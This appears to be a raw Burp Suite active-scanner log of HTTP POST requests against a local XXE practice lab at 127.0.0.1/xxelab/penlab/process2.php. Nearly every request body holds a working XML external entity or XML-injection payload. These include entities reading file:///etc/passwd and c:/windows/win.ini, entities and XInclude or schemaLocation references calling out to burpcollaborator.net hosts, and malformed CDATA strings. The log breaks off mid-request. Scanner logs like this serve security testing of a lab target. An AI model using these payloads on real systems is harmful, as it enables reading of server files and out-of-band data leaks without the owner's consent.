Burp Active Scanner XML issue payload
Burp Active Scanner XML issue payload
XML external entity injection
======================================================
2:35:56 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:57 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 269
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxezy9dd SYSTEM "http://dhyrzbdb43k185pzvz20eizt9kfd33rxfo6bwzl.burpcollaborator.net"> ]><root><name>demo&xxezy9dd;</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:57 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 228
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe7kqen SYSTEM "file:///c:/windows/win.ini"> ]><root><name>demo&xxe7kqen;</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:57 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 220
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe4hjn3 SYSTEM "file:///etc/passwd"> ]><root><name>demo&xxe4hjn3;</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:57 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 228
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxeleqma SYSTEM "file:///c:/windows/win.ini"> ]><root><name>demo</name><tel>13812341234&xxeleqma;</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:57 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 220
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxesujc3 SYSTEM "file:///etc/passwd"> ]><root><name>demo</name><tel>13812341234&xxesujc3;</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:57 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 228
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe4vonf SYSTEM "file:///c:/windows/win.ini"> ]><root><name>demo</name><tel>13812341234</tel><email>demo@163.com&xxe4vonf;</email><password>demo1234</password></root>
======================================================
======================================================
2:35:57 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 229
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxesaotv SYSTEM "file:///c:/windows/win.iniX"> ]><root><name>demo</name><tel>13812341234</tel><email>demo@163.com&xxesaotv;</email><password>demo1234</password></root>
======================================================
======================================================
2:35:59 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 269
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxedewx6 SYSTEM "http://rje51pfp6hmfajrdxd4egw17byhr5htbh28pydn.burpcollaborator.net"> ]><root><name>demo&xxedewx6;</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:59 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 228
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxeehbbp SYSTEM "file:///c:/windows/win.ini"> ]><root><name>demo&xxeehbbp;</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:59 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 220
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe0ca8b SYSTEM "file:///etc/passwd"> ]><root><name>demo&xxe0ca8b;</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:59 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 228
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxey76p6 SYSTEM "file:///c:/windows/win.ini"> ]><root><name>demo</name><tel>13812341234&xxey76p6;</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:59 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 220
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxecebug SYSTEM "file:///etc/passwd"> ]><root><name>demo</name><tel>13812341234&xxecebug;</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:35:59 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 228
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe8a53j SYSTEM "file:///c:/windows/win.ini"> ]><root><name>demo</name><tel>13812341234</tel><email>demo@163.com&xxe8a53j;</email><password>demo1234</password></root>
======================================================
======================================================
2:35:59 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 229
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxedazjt SYSTEM "file:///c:/windows/win.iniX"> ]><root><name>demo</name><tel>13812341234</tel><email>demo@163.com&xxedazjt;</email><password>demo1234</password></root>
======================================================
======================================================
2:36:03 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 269
Connection: close
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxexy4ec SYSTEM "http://5w2je3s3jvztnx4rarhstaelocu5iv6pugl3br0.burpcollaborator.net"> ]><root><name>demo&xxexy4ec;</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
XML injection
======================================================
2:53:26 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:26 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 60
Connection: close
9kun27g77znxb1svyv5whe2pcgib61utik97zvo.burpcollaborator.net
======================================================
======================================================
2:53:26 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 202
Connection: close
<?xml version="q7y4po3ougaeyifclcsd4vp6zx5stiha52ssgh.burpcollaborator.net" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 381
Connection: close
<?xml version="<ecg xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://kl9y3ihi8ao8cct6z667ip30drjm7cvcj46uuj.burpcollaborator.net/ecg.xsd">ecg</ecg>" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 326
Connection: close
<?xml version="<ucz xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://mqg08kmkdctahey848b9nr82itooce0fo7bxzm.burpcollaborator.net/foo"/></ucz>" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 160
Connection: close
<?xml version="1.0]]>><" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 200
Connection: close
<?xml version="1.0" encoding="rsn5apopfhvfjj0d6ddepwa7kyqtej2bq3du1j.burpcollaborator.net"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 379
Connection: close
<?xml version="1.0" encoding="<jlv xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://fsbtadodf5v3j70161d2pkavkmqhe727qzdq1f.burpcollaborator.net/jlv.xsd">jlv</jlv>"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 324
Connection: close
<?xml version="1.0" encoding="<fkc xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://b4gpm909r17zv3cxixpy1gmrwi2dq3e42wpndc.burpcollaborator.net/foo"/></fkc>"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 160
Connection: close
<?xml version="1.0" encoding="UTF-8]]>><"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 201
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>pwp3ensnjfzdnh4babhctue5owurih69u1ht5i.burpcollaborator.net</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 380
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name><xkg xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://uyw8gsuslk1ipm6gcgjhvzgaq1wwkm8mwej67v.burpcollaborator.net/xkg.xsd">xkg</xkg></name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 325
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name><imi xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://co4q6akab2r0f4wy2y9zlh6sgjmea4y5mx9pxe.burpcollaborator.net/foo"/></imi></name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 160
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo]]>><</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 194
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>vxw9ftttkl0jon5hbhiiu0fbp2vxjn7fv7i06p.burpcollaborator.net</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 373
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel><syk xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://t5z7nr1rsj8hwldfjfqg2yn9x03vrlfl3dq6ev.burpcollaborator.net/syk.xsd">syk</syk></tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 318
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel><oks xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://ycecuw8wzofm3qkkqkxl93ue45a0yqmrajxcl1.burpcollaborator.net/foo"/></oks></tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 160
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234]]>><</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 372
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email><vfw xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://oyq2gmumle1cpg6acajbvtg4qvwqkg8gw8j27r.burpcollaborator.net/vfw.xsd">vfw</vfw></email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 317
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email><adv xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://5jpj13f36vmtaxrrxr4sga1lbch75xtyhq4ks9.burpcollaborator.net/foo"/></adv></email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 160
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com]]>><</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 197
Connection: close
